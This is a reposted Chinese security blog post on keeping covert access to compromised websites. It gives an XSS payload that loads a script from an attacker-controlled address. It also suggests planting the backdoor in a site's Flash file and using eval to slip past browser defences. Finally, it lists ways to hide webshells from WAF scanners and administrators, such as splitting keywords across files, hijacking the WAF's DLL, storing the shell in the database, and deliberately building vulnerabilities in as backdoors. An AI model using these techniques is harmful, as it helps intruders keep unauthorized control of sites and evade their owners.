技术笔记

XSS后门的使用及隐藏

字号+ 作者:傀儡 来源:转载 2016-12-18 14:38 我要评论( )

前言 : 其实呢,这个星期我发帖子的任务已经完成了。但是想到之前,好久一阵子有事情,没发什么帖子。感觉有点对不起蛋蛋。所以特来补贴! 0x00 后门程序 后门包......

前言  其实呢,这个星期我发帖子的任务已经完成了。但是想到之前,好久一阵子有事情,没发什么帖子。感觉有点对不起蛋蛋。所以特来补贴!

0x00 后门程序
           后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一个新的账号,或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的 安全认证而对系统有安全存取权。例如一个login程序,当你输入特定的密码时,你就能以管理员的权限来存取系统。     --转载至百度百科

0x01 后门的使用及隐藏
           一. XSS后门的使用及隐藏
                  XSS后门的简介:XSS后门大都是在程序在没有突破口时,进行盲打或拿下后台时,怕管理员改掉密码而无法进入所留下的后门。
                  XSS后门的编写:很多时候,我们都会使用XSS进行攻击。而且语句基本都是<script href=你的js地址'></script><img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>这种情况,一般管理员都见怪不怪了。很轻易的就找到了我们的后门,并删除了。那。。。有什么更好的方式留下后门吗?答案是,当然。我们可以劫持网站上原本的FLASH来进行后门的植入。我们只需要在FLASH中加入以下语句。(请注意要讲原来的FLASH加载进去哦~)

                   当我们植入我们的XSS后门之后,网站管理员只要一打开就会上钩啦~当然,这种情况也是有弊端的!随着浏览器的安全性能越来越高,这种情况时不会被执行 的。(老一点的版本可以哦)那我们要怎么做呢?很简单,大家eval一句话应该都熟悉吧?JavaScript也存在eval这个函数呢!动动你们的脑 子!
          二.shell的隐藏
               一句话短小而又精湛,不容易被发现。但是,自从有了WAF,那是各种扫描啊!真tm不知道往哪里藏。下面就说下我自己藏shell的思路吧。
                     1.拆分关键字,采用多文件包含的方式隐藏。
                     2.设置文件属性为隐藏+系统文件
                     3.劫持WAF的DLL进行死循环写出。(这事我最爱干)
                     4.将真正的一句话写入数据库。(过WAF妥妥的)
                     5.制造程序漏洞。(有编程功底的自己制造漏洞当后门啊!)


0x02 结束语
                  
                                                                               By:傀儡

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/450.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~